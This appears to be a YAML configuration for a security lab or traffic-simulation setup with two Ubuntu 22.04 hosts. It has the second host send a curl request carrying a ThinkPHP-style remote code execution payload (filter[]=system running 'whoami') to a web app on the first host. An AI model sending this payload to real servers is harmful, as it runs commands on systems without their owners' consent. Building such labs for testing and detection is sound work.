blueprint: ubuntu2204-ubuntu2204
ubuntu1:
  playbook: ubuntu1.yml
ubuntu2:
  trace: "curl"
  command:
    - "curl -d \"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami\" http://%ubuntu1%/public/index.php?s=captcha"